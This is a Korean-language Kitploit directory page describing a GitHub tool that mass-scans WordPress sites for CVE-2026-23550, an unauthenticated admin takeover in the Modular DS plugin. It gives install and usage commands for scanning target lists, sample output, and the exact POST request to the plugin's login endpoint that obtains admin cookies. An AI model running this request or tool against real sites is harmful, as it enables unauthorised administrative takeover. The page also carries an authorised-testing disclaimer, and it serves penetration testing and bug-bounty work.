Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Mass-CVE-2026-23550-Exploit — # CVE-2026-23550용 멀티스레드 Python 스캐너 WordPress Modular DS 플러그인의 인증되지 않은 관리자 탈취를 탐지하며, 전체 wp-admin 검증을 포함합니다. | Kitploit
도구/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

# CVE-2026-23550용 멀티스레드 Python 스캐너 WordPress Modular DS 플러그인의 인증되지 않은 관리자 탈취를 탐지하며, 전체 wp-admin 검증을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
26개월 전아직 검토되지 않음

🔥 CVE-2026-23550 Modular DS 스캐너

CVE-2026-23550(CVSS 10.0) WordPress Modular DS 플러그인 ≤2.5.1 취약점을 위한 멀티스레드 Python 스캐너로, 40,000개 이상의 사이트에 영향을 미칩니다. getLogin() 우회를 통한 인증되지 않은 관리자 계정 탈취를 감지하고 전체 wp-admin 접근을 검증합니다. 기능 ✨

root@kitploit:~
🔥 전체 관리자 접근 감지(쿠키 + wp-admin 검증)

⚡ 멀티스레딩(최대 50개 이상의 동시 대상)

📊 rich를 사용한 애니메이션 진행률 표시줄

🎨 색상화된 요약 테이블

💾 취약한 대상 자동 저장

🚀 프로덕션 수준의 타임아웃 및 오류 처리

설치 🚀

bash pip3 install requests rich chmod +x modular_ds.py

사용법 📋

bash

대량 스캔(50개 스레드)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

버그 바운티 정찰

python3 modular_ds.py -l univ-oran1.txt -t 20

기본값(20개 스레드, vulns.txt 출력)

python3 modular_ds.py -l targets.txt

targets.txt 형식:

text https://target1.com http://site2.com

주석은 건너뜀

https://sub.domain.tld

인자 플래그 설명 기본값 -l, --list 필수 대상 파일(줄당 1개 URL) - -t, --threads 최대 동시 스레드 수 20 -o, --output 취약한 대상 출력 파일 vulns.txt 샘플 출력 🖥️

text 🔥 CVE-2026-23550 Modular DS 스캐너 🔥 대상: 247 | 스레드: 50 | 출력: bounty_vulns.txt

⠋ Modular DS 스캔 중... 127/247 (51%) ✅ 취약: https://target.com 🔥 전체 관리자 접근: target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ 상태 │ 대상 │ 세부 정보 │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 전체 │ https://target.com │ 쿠키 3개 │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 취약한 대상 4개 → bounty_vulns.txt

감지 로직 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ wordpress_logged_in_* 관리자 쿠키 확인
  3. ✅ /wp-admin/ 대시보드 접근 검증
  4. 💾 확인된 전체 관리자 접근 대상 저장

법적 및 윤리적 사용 ⚖️

text ⚠️ 다음에만 엄격히 사용: ✅ 승인된 침투 테스트 ✅ 버그 바운티 프로그램
✅ 보안 연구소 ✅ 소유한 인프라

❌ 승인되지 않은 대상에는 절대 사용 금지

요구 사항 📦

text requests>=2.31.0 rich>=13.0.0

도구 다운로드